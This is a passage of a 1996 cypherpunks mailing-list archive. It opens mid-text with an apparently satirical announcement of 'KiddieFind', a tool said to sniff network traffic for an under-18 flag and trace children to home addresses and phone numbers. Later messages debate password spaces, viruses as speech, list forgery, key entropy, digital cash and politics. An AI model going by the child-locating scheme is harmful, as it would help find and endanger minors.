federally mandated Under18 bit set, and then uses publicly accessible
databases to map them into a street address and phonenumber.

The networked version works as follows, using the provided plug in
module (a version is provided in 0.01 for AOL, I'm working on a
CompuServe version and will have it ready in a week or so) to connect
to a major online service.  Once connected it goes into the equivalent
of promiscuous mode and scans all traffic for the age bit, and
forwards the information back to your system.

After collecting all this information, it scans a number of publicly
accessible databases to turn the information into a street address.
The geographical location can be approximated by running a traceroute
on the IP address of the originating packet and works backwards until
a host with reliable geographic data can be located.  KiddieFind only
requires state-wide granularity, and this only to narrow the later
phonebook search.

Once a geographic location has been determined, it's not likely that
the child has her own phone.  Therefore the parents must be found.  A
search is done through the any number of the available on-line
telephone books.  By this stage KiddieFind should have a manageable
number of candidate numbers.  If real names are being used, than it's
easy to isolate the correct phone number.  Hopefully the Denning
geographic information will be mandated soon, thus eliminating nearly
all sources of error isolating the correct neighborhood.

If there are still too many candiate numbers a number of other mostly
automated searches can be done.  The parents' home web pages can be
searched for personal information, etc.

Once you have the system tuned, all you merely have to do to locate a
street address and phone number for any number of children is just
login and poke around a bit.  Everything else is done in the
background.  You don't even have to think about it.

I've obtained the address and phone numbers of over 5,000 children so
far, but I expect this will become easier after all the kinks in the
system are worked out.

GNU archives are located throughout the world, pick the one closest to
you for downloading.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jon Leonard" <jleonard@divcom.umop-ap.com>
Date: Fri, 19 Apr 1996 03:50:45 +0800
To: perry@piermont.com
Subject: Re: Spaces in passwords
In-Reply-To: <199604171543.LAA05427@jekyll.piermont.com>
Message-ID: <9604181538.AA16305@divcom.umop-ap.com>
MIME-Version: 1.0
Content-Type: text


> Ben Rothke writes:
> > Do spaces (ASCII 20) in passwords make them less secure?
> 
> Of course not. In a normal Unix password, adding spaces to the
> password search space increases the search space, so it necessarily
> makes the search harder.

The exception to this is when you may be overheard typing a password.
The space bar sounds different, and an attacker who knows you've used
a space has a significantly smaller search space.

So I usually recommend avoiding space, @, #, and control characters
when generating passwords.  Have I missed any or gotten too many?  

> .pm

Jon Leonard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Fri, 19 Apr 1996 01:55:15 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: EFF/Bernstein Press Release
In-Reply-To: <Pine.3.89.9604180813.A31138-0100000@tesla.cc.uottawa.ca>
Message-ID: <317649B1.3AD7@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


s1113645@tesla.cc.uottawa.ca wrote:

> On the other hand, a virus is malicious speech, no? Sorta like libel or
> fraud. You said bad and untrue things to the victim's computer and the
> dimwitted OS believed it.

Not when I wrote the virus I didn't.



______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * pain is inevitable  
       m5@tivoli.com * m101@io.com          *
      <URL:http://www.io.com/~m101>         * suffering is optional




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Fri, 19 Apr 1996 01:04:56 +0800
To: Tree frog mailing list <cypherpunks@toad.com>
Subject: Re: EFF/Bernstein Press Release
In-Reply-To: <199604180731.RAA09977@oznet02.ozemail.com.au>
Message-ID: <Pine.3.89.9604180825.A31115-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 18 Apr 1996, Mark Neely wrote:

> Well, that puts legislation making virus authoring a crime
> into a new (and difficult) position.

For that matter, is issuing unix and tcp/ip commands an act of speech
even when cracking into someone else's computer?

(I realize this might be made moot by having to read the output and 
violating the target's privacy, but then the act of cracking, in itself,
might only require commands standard on all machine, that also have 
standard and therefore predictable responses, entailing no privacy loss.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Robert LoVerso <john@loverso.southborough.ma.us>
Date: Fri, 19 Apr 1996 01:07:50 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Cypherpunks Death Penalty for "take me of" messages?
In-Reply-To: <ad9b0ca80f0210043f65@[205.199.118.202]>
Message-ID: <199604181257.IAA19331@loverso.southborough.ma.us>
MIME-Version: 1.0
Content-Type: text/plain


Ah, the new way to spam somebody.  Just forge an "unsubsrive" or "take me of"
messsage to cypherpunks.

John




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Fri, 19 Apr 1996 01:05:54 +0800
To: Cute duck watchers <cypherpunks@toad.com>
Subject: Re: EFF/Bernstein Press Release
In-Reply-To: <199604180731.RAA09977@oznet02.ozemail.com.au>
Message-ID: <Pine.3.89.9604180813.A31138-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 18 Apr 1996, Mark Neely wrote:

> Well, that puts legislation making virus authoring a crime
> into a new (and difficult) position.

On the other hand, a virus is malicious speech, no? Sorta like libel or 
fraud. You said bad and untrue things to the victim's computer and the 
dimwitted OS believed it.

Also this is impersonation. You spoke words that led the OS to think that 
you were a legit user and, having its gained trust on false grounds, it lets
you do malicious things.

So is misrepresentation also constitutional? (Not like I need this 
answered ;-> )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Fri, 19 Apr 1996 04:54:26 +0800
To: cypherpunks@toad.com
Subject: auto-spam of c'punks list
Message-ID: <199604181635.JAA27485@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Someone or something bogusly subscribed a bunch of people to the
cypherpunks list.  Please don't post any more messages running down
the "newbies".  None of these people subscribed; they were victims of
a nasty prank.

I just removed 237 people from the c'punks and c'punks-announce lists
who appear to have been subscribed by email forgery.  I probably
missed a few.  For the folks who are getting this message and who don't
want to be on the cypherpunks list(s), it's easy to unsubscribe.  Send
email to:

	majordomo@toad.com

that contains these lines:

	unsubscribe cypherpunks
	unsubscribe cypherpunks-announce

Sorry for any hassle,

	John




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 19 Apr 1996 02:13:07 +0800
To: Eric Murray <ericm@lne.com>
Subject: Re: Cypherpunks Death Penalty for "take me of" messages?
In-Reply-To: <199604180607.XAA02282@slack.lne.com>
Message-ID: <199604181341.JAA08196@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Eric Murray writes:
> There's lately been a spate of l00sers subscribing
> unsuspecting people to various hugh-traffic mailing lists.
> 
> I'd be willing to bet that a number of the 'unsubscrive' people
> we have been seeing lately have been subscrived by their "friends"
> and have never seen the "welcome to cypherpunks" list message,

No. If you are subscribed against your will you DO see the "Welcome to
Cypherpunks" message.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 19 Apr 1996 05:18:17 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Cypherpunks Death Penalty for "take me of" messages?
In-Reply-To: <199604181341.JAA08196@jekyll.piermont.com>
Message-ID: <Pine.ULT.3.92.960418093925.9454A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 18 Apr 1996, Perry E. Metzger wrote:

> Eric Murray writes:
> >
> > I'd be willing to bet that a number of the 'unsubscrive' people
> > we have been seeing lately have been subscrived by their "friends"
> > and have never seen the "welcome to cypherpunks" list message,
>
> No. If you are subscribed against your will you DO see the "Welcome to
> Cypherpunks" message.

...which they disregard as unsolicited spam.

On my discussion lists, I put unsubscribe instructions in the message
X-Headers (which the clueless won't see, but which non-clueless targets
and their more clueful friends/administrators will); and on digests,
they're prepended.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Cooper <tcooper@wwa.com>
Date: Fri, 19 Apr 1996 02:32:13 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: Clinton blathering about Internet
In-Reply-To: <Pine.ULT.3.92.960417101323.29708C-100000@Networking.Stanford.EDU>
Message-ID: <Pine.BSD.3.92.960418093626.2368O-100000@sashimi.wwa.com>
MIME-Version: 1.0
Content-Type: text/plain


>
> To be fair, I don't see any blathering, just "expressions of concern." The
> blathering quote comes from the SPLC, not Clinton.
>
Get real dude. Of course it's blathering. Either he really is that stupid
or he's trying to appeal to people's ignorant fears about the Net as some
sort of Satanic gathering place, just to get reelected.

Personally, I think that his intelligence is way over rated. He's turning
out to be just another hillbilly redneck in the White House. First
Clipper, then censorship, now fear mongering. I can't believe that a
former pot smoking, philandering, draft dodger could be such a dupe. Or is
it dope.
>
> Clinton, though, is pushing the unconstitutional "anti-terrorism"  bill,
> which is all blather, and worse, he's letting the Republicans add an
> unrelated rider that emasculates habeus corpus.
>
> -rich
>
>
Letting the Republicans? Clinton's on their side all the way.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 19 Apr 1996 02:15:01 +0800
To: JonWienke@aol.com
Subject: Re: why compression doesn't perfectly even out entropy
In-Reply-To: <960418025428_377757492@emout17.mail.aol.com>
Message-ID: <199604181352.JAA08215@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



JonWienke@aol.com writes:
> >Is it possible to find a percentage of the key space to eliminate that
> >will optimize security assuming that the attacker will try the easy
> >stuff first (and is it possible to quantify "easy stuff")?
> 
> If you eliminate all repeating byte sequences, such as 00 00 or 7F 7F, you
> will reduce your possible entropy by .07058% (7.99435 bits per byte), and
> eliminate the (astronomically remote) possibility of Hamlet or some other
> English text popping out of your RNG/PRNG.  As long as your key is long
> enough to withstand this slight entropy reduction, you are still OK.

Before making pronouncements like "You are still OK" you ought to
learn a bit more about cryptanalysis. Its tiny little statistical
toeholds like that which permit breaks. I don't know for sure, but my
intuition says that there may very well be instances in which a couple
of little nicks like that into the entropy of a key are sufficient to
radically lower the time to crack something. Since there are far
better techniques available (hash distillation, for instance) for
assuring the quality of a random stream, Jon's suggested techniques
should be regarded as unnecessary and dangerous.

PUBLIC SERVICE ANNOUNCEMENT:

For the benefit of everyone reading, I've become increasingly
convinced that Jon really doesn't understand the topic he's working on
well enough to trust, and he doesn't have the sense to know that he
doesn't understand it well enough. I know enough to know that I'm
extremely ignorant -- he's ignorant enough to think that he knows more
than he does. I don't mean to insult Jon -- I'm sure that in his own
field whatever it is he's a smart enough guy, and he seems like a nice
enough fellow -- but cryptography is a dangerous business -- bad
technique KILLS, literally. Until Mr. Wienke loses his bad case of
hubris I would suggest not taking his technical suggestions.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 19 Apr 1996 01:58:29 +0800
To: Mark Neely <accessnt@ozemail.com.au>
Subject: Re: EFF/Bernstein Press Release
In-Reply-To: <199604180731.RAA09977@oznet02.ozemail.com.au>
Message-ID: <199604181404.KAA08249@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Mark Neely writes:
> Well, that puts legislation making virus authoring a crime
> into a new (and difficult) position.

Its not in any worse a position than laws outlawing conspiracy to
commit murder. The crime is not (and must not be!) in writing the
virus, which can be a perfectly innocent act -- the crime is in
writing and taking active steps to use it as a weapon.

> 
> Mark
> ___
> Mark Neely - accessnt@ozemail.com.au 
> Lawyer, Internet Consultant, Professional Cynic
> Author: Australian Beginner's Guide to the Internet
> Work-in-Progress: Australian Business Guide to the Internet
> WWW: http://www.ozemail.com.au/~accessnt
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Fri, 19 Apr 1996 01:52:21 +0800
To: secret@secret.alias.net>
Subject: Re: CDA Court Challenges
In-Reply-To: <199604172315.SAA12354@paulsdesk.phoenix.net>
Message-ID: <ElRYkLG00YUvQ4oCF8@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 17-Apr-96 CDA Court Challenges by
K00l Secrets@secret.alia 
> Are Declan's CDA reports numbers 1 and 2 available anywhere?  I seemed
> to have missed them on the mailing list, and the web site also starts
> at 3.  Thanks.

Yeah, I should make sure they're all up on the fight-censorship archive
site (http://fight-censorship.dementia.org/top/). Until then, you can
find them at:

  http://www.eff.org/pub/Legal/Cases/EFF_ACLU_v_DoJ/

-Declan
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 19 Apr 1996 02:13:25 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: EFF/Bernstein Press Release
In-Reply-To: <Pine.3.89.9604180825.A31115-0100000@tesla.cc.uottawa.ca>
Message-ID: <199604181421.KAA08296@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



s1113645@tesla.cc.uottawa.ca writes:
> For that matter, is issuing unix and tcp/ip commands an act of speech
> even when cracking into someone else's computer?

Standing in front of a voice activated gun pointed at someone and
shouting "fire" is still an act of murder.

The issue is whether you have intent to kill, or break in, or
whatever, not whether or not you speak. Pulling on my index finger
isn't a crime either, unless there is a trigger in front of the
finger, and the trigger is attached to a gun aimed at someone, and I
know what I'm doing. Normally, however, pulling back on my index
finger is no crime at all.

This is why it can be a crime to conspire to commit murder even though
speech is protected.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 19 Apr 1996 04:13:17 +0800
To: cypherpunks@toad.com
Subject: e$: The CDA and Mrs. G vs. the MTB and Mr. T. -- SINless DBCs?
Message-ID: <v02120d00ad9c0028b86f@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


--- begin forwarded text

Comments: Authenticated sender is <rah@shipwright.com>
From: rah@shipwright.com (Robert Hettinga)
To: "e$" <e$@thumper.vmeng.com>
Date: Wed, 17 Apr 1996 19:47:19 -0400
Subject: e$: The CDA and Mrs. G vs. the MTB and Mr. T. -- SINless DBCs?
Reply-to: rah@shipwright.com
CC:
Priority: normal
Sender: postmaster@thumper.vmeng.com
Precedence: bulk


-----BEGIN PGP SIGNED MESSAGE-----

e$
Robert Hettinga

The CDA and Mrs. G vs. the MTB and Mr. T. -- SINless DBCs?

4/17/96


Recently, Mark Twain Bank (MTB, for short) of St. Louis, Missouri,
cancelled the ecash accounts of known pornographers. We haven't heard
anything about this from Frank Trotter (Mr. T, for short), the bond trader
who runs MTB's ecash program, or anybody else at the bank, for that matter,
and it dawns on me today that we shouldn't really expect to.  MTB is
completely within its rights, as any bank is, to refuse an account to
anyone, for any reason whatsoever, except where required *not* to do so by
statute. Now, there's a paradox, yes?

Fortunately, we don't have to do too much tweaking to get an underwriting
system for digital bearer certificates (DBCs, for short) which gets us
around around the current unpleasantness, one which scales nicely into a
totally anonymous system, and which still allows heavily regulated (and
censored) banks of deposit like MTB to profit quite well from cash-settled
digital commerce on the internet.


An interesting thing about this particular epsiode of self-censorship is
that MTB did this *before* the Communications Decency Act (CDA) made
offensive discourse -- of any kind, anywhere on the net -- illegal in the
United States. As an aside, the CDA reminds me of the old chestnut about
politically correct Cambridge (Massachusetts) during the first convulsions
of second-hand-smoke mania: "In Cambridge, it's illegal to smoke in
Boston."

MTB, or its antecedants, has probably *always* cancelled a pornographer's
bank account upon discovery, and has been doing this since long before
*computers* existed, much less geodesic public networks. Rather than
excoriate Mr. Trotter and company for bobbling the future, we should
remember that Robert Heinlein's famous nosy-spinster next-door neighbor,
Mrs. Grundy (Mrs. G, for short), *also* lives in Missouri. I spent
middle-to-late adolescence there, and believe me, having moved late one
July in the mid-1970's from Anchorage, AK to Ballwin, MO -- which I once
likened to going from Haight-Ashbury to Happy Days in a single plane ride
- -- I have first-hand knowlege. Mrs. Grundy, god bless her whalebone
corset,
is a pivotal fact of the universe in Missouri, which, also from personal
experience, is a great place to be, er, from. Don't get me wrong. I mean,
some of my best friends are from Missouri. I just wouldn't let my daughter
move there.

Anyway, as a bank of deposit, MTB does *lots* of business with Mrs. Grundy,
thank you very much, and, frankly, it does a *lot* more business with Mrs.
Grundy than it does with the net. Frank is following the imperatives of his
market, and, he is no fool.


Lots of moneypunks out there would say that this only highlights the need
for more issuers of ecash, in locations safe from government interference,
where they can issue digital cash certificates to whomever they choose.
This is, of course, the concept of jurisdiction-shopping, or, as Eric
Hughes likes to call it, "regulatory arbitrage". I've been giving this some
thought, lately. Advocates of jurisdiction shopping forget, of course, that
there is no real bandwith, much less competitive free-market bandwidth, in
places like Vanuatu, or the Cayman Islands, or probably even Leichtenstein.
*.li domains are more likely to get bandwidth faster than the Small Island
Nation (SIN, of course ;-)) of one's dreams. If we lived here, we'd be home
now. The market, in it's current state, is efficient. Big drag.

On the other hand, statists argue that nation-states should pass
legislation (so, what else is new...) saying that issuers of digital cash
should not be liable for the acts of people using their product. After all,
we don't restrict the sale of cars to known bank-robbers, do we? Actually,
I've used a straw man here, though a necessary one, as there are more
f*ckingstatists out there than there are eL33t mone$ypunk d00ds. Almost by
definition, there's no legislative constituency for digital cash, so
legislation mandating its liberal issuance sounds more than a little silly.
Ecash is under the regulatory radar for the moment, probably because the
market is virtually nonexistant.  Regulatory stipulation of ecash
non-liability actually puts yet another's camel's nose under the tent of
banking freedom, which is what we're really fighting for here, right?  No
need to put one nose there before its time...

What moneypunks and (imaginary) statists fail to realize is something that
lots of cypherpunks, particularly Eric --  and Tim May -- have been saying
all along. The problem should be solved, not by laws, or even regulatory
arbitrage, but by cryptographic protocol.  That way, it doesn't matter
*where* the bank is, or *who* its customers are.  Unfortunately, even
though we have Eric's great open books idea, so that we might be able to
anonymously audit an anonymous bank's books, and we have good hope of
location-blinding someday, with things like web-proxies and maybe even
IP-spoofing, it doesn't seem like we're really there yet.  There's another
problem, though. What happens when a previously-secret bank is exposed for
the feelthy porno-grubbing perverts that they really are? Enter Mrs.
Grundy.  We're back to square one, or, more properly, in a low-bandwidth
SIN (heh...).


Someday, when we have truly anonymous banks, probably through some
combination of SINs-with-bandwidth and strong two-way anonymity, legal or
not, all of what I'm about to say will be moot. In the meantime, I have a
quick-and-dirty fix, using what we have now. The trick is to use the right
kinds of organizational entities to do the right things, and stay under the
regulatory radar as long as possible. That is, until SINs-with-bandwidth
exist and force the issue.  By then, the digital bearer certificate market
will be too big to control by state-sanctioned force, we hope.

To do this, I will, for the final time (Really. Honest to god. I'll include
it by URL-reference next time. ;-)), trot out my current
world-according-to-Hettinga market model for digital bearer certificates.
This won't hurt a bit. Really. Well, maybe just a *little*...


Remember, we're talking about a many-to-many relationship between each type
of entity below. In addition, anyone who sells something is assumed to have
competition. In fact, the more there are of any given entity, the more
robust a given DBC market would be. Finally, there's nothing new here to
anyone who knows how securities are presently issued, except that the
intermediaries (like exchanges, market makers, etc.) can be much smaller
and more decentralized, because lower net-borne transaction processing and
distribution costs reduce barriers to entry. It ain't rocket science,
folks.

1. Protocol Designers. People like Chaum, Shamir (MicroMint), etc., who
develop cryptographic e$ protocols.

2. Underwriters. Markets, issues, and validates the DBCs they issue, in
this case, ecash. Charges fees to ecash buyers, redeems ecash certificates
at "par". Exchanges for other denominations or expired cash are probably
free. In addition, underwriters should have some kind of cross-issuer
clearing arrangement, so that certificates of the same type issued by
different underwriters would look all the same to the user. This should be
peer-to-peer, with their trustee (below) acting as trusted intermediary,
settling exchanges off the net.  They could also all agree to use a central
clearinghouse, but that becomes a major failure-point for the entire
system, and a possible target of Mrs. Grundy, or worse, her more er,
avuncular, associate, the nation state, sometime in the future.
Cross-issuer clearing could also be a non-issue with inter-certificate
standards, enough bandwidth and the right kind of client software.

3. Trustees. Real-live banks of deposit. Each one has wire connections to
SWIFT, probably to the ATM system, and holds the collateral account for the
funds on the net. Responsible to the users of ecash, even though the users
are anonymous. Pays seignorage (interest on the collateral account) to
underwriters, maybe protocol designers. Charges account, transaction fees
to same. Insert MTB, or an equivalent, here.

4. Buyers/Sellers. People who buy and sell stuff using ecash, on- or off-
line. Merchants can be called a high-volume subclass of on-line users, and
they probably have special software and relationships to issuers.

5. Software Developers. Develop and sell software to underwriters,
trustees, buyers/sellers under license to designers, where necessary.

My favorite transaction model for purchasing and redeeming ecash involves a
waterb^h^h^h^h^h^h, er, secure web-page, a card-swiper, a trustee bank with
a SWIFT and ATM link, and an underwriter. By the way, Goldberg, Shostack,
Parekh(?), and the hardware guy who does HP-XXX crypto -- forgot your name,
very sorry -- have some king-hell ideas for card-swipers that emulate
floppy disks, both in hardware and software, and output an encrypted
DOS-readable file to be read by whatever application needs it. They figured
all this out, right there in front of me, between trips to the nosh table
at the trade-show section of CFP96. I was so impressed, I bought their
dinner later on. Talk to them about development rights. ;-).

Anyway, the buyer goes to the underwriter's web-page, punches in the amount
desired, swipes his ATM card and punches in his PIN. This information is
read and encrypted by the card swiper, and is sent through the underwriter
and the trustee, ala Cybercash, to the buyer's bank. The trustee gets a
transaction confirmation to issue cash from the buyer's bank on the ATM
network, just like an ATM machine does, to be settled on SWIFT later.  The
trustee then issues a confirmation to the underwriter, who issues the
ecash, which is stored by the buyer until use.

Redemption does the same thing in reverse.


The neat thing about this business model is that it's not only robust --
Metcalfe's law talks about the value of a network being directly
proportional to the numbers of nodes connected to it, and that certainly
maps well to financial networks like this -- but *every one* of the players
in it can eventually be anonymous on the net side. The relationship between
the buyer of ecash and his off-net bank is probably biometrically
identified, but that's what we have over there anyway, and it certainly
that can be changed someday, SIN-wise, as soon as some fiber is pulled or
the sattelites fly. The trustee bank cannot see who the buyer/redeemer is,
because the transaction can be blinded through to the buyer's off-net bank.
The underwriter certainly doesn't need to know anyone's identity on the net
side, because of the blind signature protocol, or on the trustee side,
because it can only get its financial ability to issue certificates from
its trustee, who we've shown doesn't know who the money's from, either.

To repeat, this can scale into a system where *nobody* has to know
*anybody* to reliably transact business on a cash basis. Trustees,
underwriters, protocol designers, buyers/sellers (transactants?), software
developers: No one.

The real beauty of this in the present environment, where Mrs. Grundy is
such a "pivotal fact of the universe", is that the trustee bank, a bank of
deposit like Mark Twain Bank, is abstracted completely away from
transaction events. The only account Mark Twain has to deal with is a
trustee account, one for each underwriter, and, if the underwriters have
any sense about protecting their liability against key theft (Hello, Mr.
Borenstein...), one for each underwriter's DBC issue, each issue with its
own expiration date. This account sees nothing but debits and credits,
irrespective of their pornographic content, for the day's traffic on and
off the net.  The bank can be in any current legal jurisdiction, for the
time being, anyway, because it's just taking money on and off its books
based on SWIFT and ATM transactions, just like any normal bank would do.
The only difference is its network connections to its DBC underwriters,
which are no different from it's other on-line connections, analog and
digital, with all its other customers.

Now, the ability to do this may change, especially if the volume of cash
business on the net gets high enough for nation states to begrudge the
seignorage being made by the bank and its customers this way, or, more
likely, if the local Mrs. Grundy is FUDded by the media into banning
cash-settled internet commerce on, heh, principal. Hopefully, by that time,
maybe small island nations will have enough bandwidth. Or, better yet,
utter two-way anonymity will allow banks to become invisable, at least as
far their contacts with other entities on the net are concerned, which
means they could again be anywhere, and functionally out of the reach of
the law.

Finally, as much as I'm rooting for Mr. T at MTB, he is still stuck doing
business with Mrs. G, who may actually be on his board or management, and
not just in his customer base.  And, don't forget the legal consequences of
a creatively-applied CDA. There is even a silly sod or two on the ecash
email list at the moment, talking seriously about age-differentiated ecash,
god help us all, not to mention the Mormon-from-hell who wants to us to
include a minor-flag in IP packets, of all places. (I really suppose I
*should* talk, as I'm all for sticking micromoney on packets to pay for
routing them someday...)

The point is, unless Mr. T can figure a way to financially unwind his
underwriting role now, he's probably stuck as a combination
underwriter/trustee, which actually has some advantages, one being the
innecessity to report any information to the ecash userhood about actual
contents of the ecash "mint" collateral account (Backed by the Full Faith
and Credit of the Mark Twain Bank, of course...). But, it does him
absolutely no good with regard to the aforementioned "grundiness": in his
client base, on his board, or management heirarchy, or maybe even in his
own moral paradigm, god bless *him*.

However, it doesn't mean that somebody, or, better, lots of somebodies,
can't step in and implement either side (but not both!), of the trustee /
underwriter model, sidestepping the problem of Mrs. G completely. It also
seems to me that doing this would be much easier if someone was a trustee
exclusively, from scratch, but I may be wrong.

So, I guess I'm hoping, possibly in vain, that someone at Digicash will
wake up one morning and do what they did on the software side: get out of
the manger with the other monopoly dogs like Microsoft, and break up the
functionality of their business model some more, so that the more prosaic
bovine entities of the banking world, i.e., institutional trustees (sorry,
ladies...) can have their breakfast.

I bet there are whole bunches of successful institutional trustee banks out
there, who could hold hold the money while it's on the net, and, as long as
they don't have to do much else with it except communicate electronic
transaction confirmations back and forth to an underwriter, would love to
do so. This kind of business is something they already understand quite
thoroughly.

If not, I bet there are more than a few pioneers out there who actually
understand ecash and other DBC technologies, and would get into the
business of being a trustee as their primary focus of business. Certainly
Mr. T himself is an existence proof of that, his adventures in Grundyland
notwithstanding.

Also, turning scads of independent underwriters loose on the net to bash
away at the problem of marketing cash-settlement digital commerce might do
wonders for David Chaum's mortgage payments on that brand-new Digicash
building.

So, even though Mrs. Grundy currently has her bloomers in a bunch, CDA or
no, and is letting Mr. T  and MTB know all about it, Mr. T, or someone like
him, can still save the day, for a while, anyway, with SINless DBCs.

.....Which is the plaintext of the title, I believe...

w5

 ;-).

Cheers,
Bob Hettinga


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMXWCGvgyLN8bw6ZVAQFLrQP9EDRjyYuafbzjEhLOEk/BKDRUQD+Ucf4+
oS2JYV4ooVzBDjIwQxrKH2+RH4SbEMIEpq2+pPpRMin0PJEol5XP5QxtOsYZz37I
U6J1qpvk4v+LkA+8v+9oIQSuXAynN6Lagn5I8ZTLf2eZY/bWDVezEbEwKHYrmluw
WKYASgw3B64=
=/Ojq
-----END PGP SIGNATURE-----

--------------------------------------------------
The e$ lists are brought to you by:

Making Commerce Convenient (tm) - Oki Advanced Products - Marlboro, MA
Value-Checker(tm) smart card reader= http://www.oki.com/products/vc.html

Where people, networks and money come together: Consult Hyperion
http://www.hyperion.co.uk                    info@hyperion.co.uk

See your name here. Be a charter sponsor for e$pam, e$, and Ne$ws!
See http://thumper.vmeng.com/pub/rah/ or e-mail rah@shipwright.com
for details...
-------------------------------------------------

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SBinkley@atitech.ca (Scott Binkley)
Date: Fri, 19 Apr 1996 02:32:32 +0800
To: cypherpunks%toad.com@genie_1
Subject: Re: [NOISE] Suscrive toasterpun
In-Reply-To: <029C983A02502C79@-SMF->
Message-ID: <039C983A01502C79@-SMF->
MIME-Version: 1.0
Content-Type: text/plain


>>         If cypherpunks made toasters...
>>            Jim B and Black Unicorn would argue about whether toast 
should be
>> buttered, and what the appropriate flavor of jam/jelly should be; TC 
May
>> would point out that it wasn't really toast, but rather, sliced and
>> slightly-burned bread; Perry would kvetch about the lack of 
crypto-relevance
>> of toasters; and a few others would form a new listserver for 
toasterpunks.
>> The service department would be flooded with calls from newbies, 
asking how
>> to make toast.
>> 
>>         If Netscape made toasters...
>>            They'd beta-test the toasters for months, then make one 
slot too
>> wide and the other too narrow. It wouldn't be until a cook in a diner
>> pointed out that the toast wasn't coming out right that they'd have 
their
>> design reviewed by a 3rd-party Toaster Engineer.
>>
>and during daylight savings time, you wouldn't be able to reload the 
>toaster for an hour unless you set your toaster to standard time or 
>created a timezone variable.

And newbies would start crying when the forgot how to get off the list!!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 19 Apr 1996 06:01:37 +0800
To: Tom Cooper <tcooper@wwa.com>
Subject: Re: Clinton blathering about Internet
In-Reply-To: <Pine.BSD.3.92.960418093626.2368O-100000@sashimi.wwa.com>
Message-ID: <Pine.ULT.3.92.960418095309.9454D-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


[By the way, that ILF/SAC rant WAS a joke. It's disappointing how many
people were trolled, but on the other hand, it taught me something about
how I come across, and to be more careful.]

On Thu, 18 Apr 1996, Tom Cooper wrote:

> > To be fair, I don't see any blathering, just "expressions of concern." The
> > blathering quote comes from the SPLC, not Clinton.
> >
> Get real dude. Of course it's blathering. Either he really is that stupid
> or he's trying to appeal to people's ignorant fears about the Net as some
> sort of Satanic gathering place, just to get reelected.

You have extrapolated this from a sentence fragment taken from an
off-the-cuff answer to a question from a Japanese reporter? Either you
have a subtle mind indeed, or you're blathering, too.

Remember that speech Clinton gave to the Association of Community Colleges
where he blamed the Oklahoma bombing on talk radio hosts and called for
censorship? Didn't happen. My friends in the NRA, and the occasional fund
raising letter (I've been a member of the NRA for years), keep bringing up
this speech for propaganda purposes, but it's much more a legend than a
truth.

http://docs.whitehouse.gov/white-house-publications/1995/04/1995-04-24-president-to-association-of-community-colleges.text

|             In this country we cherish and guard the right of free
| speech.  We know we love it when we put up with people saying things we
| absolutely deplore.  And we must always be willing to defend their right
| to say things we deplore to the ultimate degree.  But we hear so many
| loud and angry voices in America today whose sole goal seems to be to try
| to keep some people as paranoid as possible and the rest of us all torn
| up and upset with each other.  They spread hate.  They leave the
| impression that, by their very words, that violence is acceptable.  You
| ought to see -- I'm sure you are now seeing the reports of some things
| that are regularly said over the airwaves in America today.
|
|             Well, people like that who want to share our freedoms must
| know that their bitter words can have consequences, and that freedom has
| endured in this country for more than two centuries because it was
| coupled with an enormous sense of responsibility on the part of the
| American people.
|
|             If we are to have freedom to speak, freedom to assemble,
| and, yes, the freedom to bear arms, we must have responsibility as well.
| And to those of us who do not agree with the purveyors of hatred and
